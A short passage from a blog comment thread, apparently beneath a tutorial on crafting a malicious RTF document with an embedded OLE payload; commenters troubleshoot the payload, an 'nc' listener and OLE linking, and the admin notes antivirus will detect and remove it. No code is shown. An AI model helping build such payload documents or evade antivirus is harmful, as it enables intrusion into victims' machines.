      you should check if the research-doc.rtf have the payload inside or not. if so, then ou might have a issue with the nc command, or the other case, maube it didn’t get the payload from the edited .rtf

  • judy
    July 21, 2017

    it’s giving error on saving when link the ole

    • admin
      July 28, 2017

      Check if you have any AV or something. If you have AV it will detect it, and remove it.

Leave a Reply

Your email address will not be published. Required fields are marked *